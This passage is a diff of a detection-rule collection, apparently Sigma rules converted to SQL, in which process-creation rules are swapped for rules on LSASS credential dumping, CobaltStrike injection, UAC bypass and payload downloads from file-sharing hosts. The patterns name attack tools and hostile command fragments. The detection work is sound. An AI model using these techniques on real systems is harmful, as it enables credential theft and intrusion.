], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' 
ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Rare System Admin Activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects 
the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + 
"attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.lateral_movement" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", - "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1106" ], "falsepositives": [ - "Other scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' 
ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' 
AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", - "status": "experimental", - "description": "Detects suspicious manipulations of default 
accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "status": "test", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR 
CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR 
CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "status": "test", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
+ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "status": "test", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' 
ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" ], - "filename": "proc_creation_win_rundll32_sys.yml" + 
"filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", 
